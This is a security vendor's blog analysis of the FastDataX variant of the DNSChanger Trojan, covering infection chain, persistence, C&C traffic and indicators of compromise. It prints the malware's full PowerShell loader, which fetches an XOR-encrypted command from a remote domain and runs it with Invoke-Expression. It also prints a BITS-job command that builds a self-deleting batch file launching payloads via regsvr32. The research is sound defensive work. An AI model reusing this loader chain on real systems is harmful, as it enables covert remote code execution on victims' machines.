Verint’s Cyber Research team has recently discovered evidence of a new campaign for a variant of the infamous DNSChanger Trojan, which, as its name implies, alters a computer’s DNS entries to point toward rogue name servers. The new Trojan was identified through alerts in a Verint Threat Protection System (TPS) installation, which were triggered by its behavioral C&C detection engine. The alerts triggered an automatic investigation in TPS, which identified other suspicious domains and combined all related alerts into one security incident.
Using forensic tools, Verint’s Cyber Research determined that this DNSChanger campaign utilizes familiar characteristics and patterns, such as PowerShell scripts, BITS Jobs and communication patterns used in previous campaigns. Further analysis uncovered the initial infection point, related payloads and additional domains and concluded they are all part of the new campaign. Interestingly, the campaign makes use of new domains that were registered on March 2017 and are yet to be linked to DNSChanger.
Previous DNSChanger campaigns have been tightly connected with Adware and PUAs as a source of (re)-infection. The campaign utilizes a file named “fastdatax.exe” and initial analysis suggests this may be the DNSChanger. This file creates the BITS tasks, which make the DNSChanger network connections to download and execute payloads (see below).
We named the current campaign “FastDataX” since it revolves around a software with this name and communicates with FastDataX[dictionary word].info web sites.
The following Blog is a detailed account of the Verint research team’s findings and includes:
- Initial detection of the malware via behavioral C&C alerts
- Forensic analysis of infection point
- Persistence methods
- Related network traffic analysis
- List of IOCs
INITIAL DETECTION
The Verint Threat Protection System (TPS) issued several behavioral C&C alerts pertaining to several fastdatax*.info domains and started an automatic investigation:
Verint Threat Protection System – C&C (Behavioral Analysis) Alert
Verint Threat Protection System – Link Analysis
INFECTION POINT
Forensic analysis of the alerted endpoint revealed the following scenario: A user voluntarily downloaded a malicious file from some file-sharing website, after the user double-clicked the file, an .xht file (XHTML, an HTML file which is defined as an XML application) was dropped and executed.
The .xht file included a link to
http[://]ab0cd85de032858b2efc-98b168bd21c640d1dbb3a0f567ddbbfe.r14.cf1.rackcdn.com/kOcQm1koU2hOmFWMxOJbQo0m9p/lpx.html
Also, displayed several images hosted by imgur.com, which are instructions on how to save and execute the downloaded software:
imgur.com images
The execution of the file also triggered a chain of events which lead to the installation of several software bundles which can be categorized as PUP/Adware. Among those were YeaDesktop, PCCleanPlus, X-Madbench and FastDataX. Out of these adware, FastDataX was looking most curious and insidious
As with previous campaigns (which abused applications like Optimizer Pro and System Healer), these Adware are the second stage of infection for DNSChanger.
PERSISTENCE
Several persistence mechanisms were utilized by the installed PUP/Adware:
- Registry ‘run’ key – abused by such Adware as YeaDesktop
- Scheduled tasks with the application name, abused by Adware like ‘Pangody’ & X- Madbench. For example and scheduled task named “X-Madbench”, which executes rundll32 “C:\Program Files\X-Madbench\X-Madbench.dll”,SceNcISYvR
- Scheduled tasks with random names and GUID that execute DLLs via rundll32. For example, scheduled task named “E3605470-291B-44EB-8648-745EE356599A”
- Scheduled tasks with random names that executes PowerShell (see more details below)
- BITS jobs (see more details below)
PowerShell
FastDataX.exe maintains persistence via a scheduled task named “FastDataX”, and an additional scheduled task is created in a GUID structure (7D0A0D47-057F-040C-7E11-7E0D7905117D). This task is comprised of the following PowerShell :
$ErrorActionPreference="stop";
$sc="SilentlyContinue";
$WarningPreference=$sc;
$ProgressPreference=$sc;
$VerbosePreference=$sc;
$DebugPreference=$sc;
/************************************************************\
registry update - position windows out of bounds of screen
\************************************************************/
function RegistryUpdate($p){
$n="WindowPosition";
try{
New-Item -Path $p|Out-Null;
}
catch{
}
try{
New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664|
Out-Null;
}
catch{
try{
Set-ItemProperty -Path $p -Name $n -Value 201329664|Out-Null;
}
catch{
}
}
}
RegistryUpdate("HKCU:\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe");
RegistryUpdate("HKCU:\Console\%SystemRoot%_System32_svchost.exe");
RegistryUpdate("HKCU:\Console\taskeng.exe");
/* this is the URL with the GET params */
$surl="http[://]fastdataxster[.]info/u/?a=2tpeW5PNy/** snipped by VERINT to
protect customer privacy */";
/* end of url with params */
$stsk="{
7D0A0D47-057F-040C-7E11-7E0D7905117D
}
";
$prid="FastDataX";
$inid="NRMNUMSW";
try{
/* check for PS version - if 1 exit) */
if($PSVersionTable.PSVersion.Major -lt 2){
break;
;
}
$v=[System.Environment]::OSVersion.Version;
/* checks if Windows env is early then 8, exit if it is */
if($v.Major -eq 5){
if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).
ServicePackMajorVersion -lt 2)){
break;
;
}
}
/* checking for permissioned user - if not administrator - exit */
if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]
::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){
break;
}
/************************************************************\
* GET Request, download further instructions, using a "legit" UA (not really)
\************************************************************/
function downloadCmd($url){
$rq=New-Object System.Net.WebClient;
$rq.UseDefaultCredentials=$true;
$rq.Headers.Add("user-agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)");
return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));
}
/*************************************************************************\
* Decryption scheme (second byte in stream used as XOR + Offest, then AND 0xFF
\************************************************************************/
function decryptCmd($rawdata){
$bt=[Convert]::FromBase64String($rawdata);
$ext=$bt[0];
$key=$bt[1] -bxor 170;
for($i=2;
$i -lt $bt.Length;
$i++){
$bt[$i]=($bt[$i] -bxor (($key + $i) -band 255));
}
return(New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream(
(New-Object IO.MemoryStream($bt 2 ($bt.Length-$ext))) [IO.Compression.CompressionMode]
::Decompress)))
.ReadToEnd();
}
$sc=decryptCmd(downloadCmd($surl));
Invoke-Expression -command "$sc";
}
catch{};
exit 0;This PS script combines an outgoing GET message to fastdataxster[.]info and a decrypted body. The decrypted response holds execution data and thus can expand the malware’s abilities upon will.
The structure of this PowerShell is similar to a previously analyzed DNSChanger PS script. It should be noted that the domain embedded inside the script is new and was not previously linked to the DNSChanger campaign.
BITS job:
FastdataX also uses BITS (Background Intelligent Transfer Service) jobs which generate HTTP Head messages to fastdataxcast[.]info and fastdataxfire[.]info. We could not find online information regarding these domains or any association between them and the current malware campaign.
That being said, the two types of BITS job are identical to previously analyzed BITS jobs.
The following BITS job is an example of a task recovered from the BITS logs of the infected endpoint and it is used in order to download, install and perform clean-up of the malware payloads.
BITS job to create batch
"cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\4806190a-7c75-
1\x.bat" &
echo bitsadmin /complete 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-
1\x.bat" &
echo bitsadmin /cancel 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-
1\x.bat" &
echo if exist "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" goto q >>
"C:\ProgramData\4806190a-7c75-1\x.bat" &
for /f %i in ('dir /a:-d /b /w "C:\ProgramData\4806190a-7c75-1\*.tmp"') do (echo start
/b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\%i"
>> "C:\ProgramData\4806190a-7c75-1\x.bat")) > nul &
echo :q >> "C:\ProgramData\4806190a-7c75-1\x.bat" &
echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-
1\4806190a-7c75-1 d" >> "C:\ProgramData\4806190a-7c75-1\x.bat" &
echo del "C:\ProgramData\4806190a-7c75-1\x.bat" ^& exit >> "C:\ProgramData\4806190a-
7c75-1\x.bat" &
"C:\ProgramData\4806190a-7c75-1\x.bat""./.S-1-5-21-3582221642-4087043515-2770962101-
1001
Changes to the DNS settings
DNSChanger has been using one of three methods in order to change the DNS settings:
- Modifying the ‘NameServer’ & ‘DHCPNameServer’ settings in the Windows registry, thus replacing the configured servers with new DNS servers (by calling the DhcpNotifyConfigChange (API)
- Changing the router’s DNS configuration (as analysed by Proofpoint)
- Editing the local HOSTS file
The ‘FastDatax’ variant of DNSChanger is using the second method. It adds multiple domains (see list in the IOC section of this article) that are used to download additional payloads
NETWORK ANALYSIS
An analysis with Verint’s TPS Network Forensics component, which enables a detailed network analysis, revealed evidence of the malware’s C&C communication:
Verint Threat Protection System – Network Analysis
This enabled the Cyber research team to distinguish between three types of sessions with similar structures:
1. HEAD request sessions to “fastdataxfier[.]info” and “fastdataxcast[.]info”. As discussed above, these are generated by FastDataX BITS jobs:
2. GET request sessions to “fastdataxster[.]info” that were generated by the above mentioned PowerShell script:
3. POST request sessions to “fastdataxient[.]info“, “fastdataxium[.]info” and “fastdataxify[.]info“
It should be noted that all the FastDataX domains were resulted to the 81.171.14.67 IP address, which was used in previous DNSChanger campaign.
As can be seen from the above images, the user agents used by the malware are different from each other and are spoofed. Noticeable example for that is a “bug” in generating a user-agent, where the word “user agent” appears twice:
It has a similar traffic structure that was observed in the past and referred to DNSChanger, where parameters contained system information and DNS configuration information.
Below is a list of identified IOCs relating to the FastDataX campaign.
IOCs
Domains/IPs:
| Seen on 21-22.06.2017 in Verint TPS |
| 81.171.14.67 |
| fastdataxium[.]info |
| fastdataxcast[.]info |
| fastdataxfire[.]info |
| fastdataxster[.]info |
| fastdataxient[.]info |
| fastdataxify[.]info |
Related domains:
| Domain | Passive DNS replication date |
| fastdataxate.info | 2017-07-07 |
| fastdataxsage.info | 2017-07-06 |
| fastdataxigy.info | 2017-07-05 |
| fastdataxopoly.info | 2017-07-05 |
| fastdataxace.info | 2017-06-30 |
| fastdataxcube.info | 2017-06-27 |
| fastdataxdigita.info | 2017-06-27 |
| fastdataxmage.info | 2017-06-27 |
| fastdataxmancer.info | 2017-06-27 |
| fastdataxmaven.info | 2017-06-27 |
| fastdataxpro.info | 2017-06-27 |
| fastdataxrunner.info | 2017-06-27 |
| fastdataxstar.info | 2017-06-27 |
| fastdataxster.info | 2017-06-27 |
| fastdataxity.info | 2017-06-27 |
| fastdataxality.info | 2017-06-27 |
| fastdataxfeed.info | 2017-06-25 |
| fastdataxcast.info | 2017-06-21 |
| fastdataxfire.info | 2017-06-21 |
| fastdataxient.info | 2017-06-21 |
| fastdataxify.info | 2017-06-21 |
| fastdataxium.info | 2017-06-21 |
| fastdataxio.info | 2017-06-08 |
Domains found inside the HOSTS file
We’d be very interested in hearing your comments! Feel free to contact us
The post Watch Out: The FastDataX campaign -DNSChanger is Back! appeared first on Verint.
Article Link: https://cyber.verint.com/watch-fastdatax-campaign-dnschanger-back/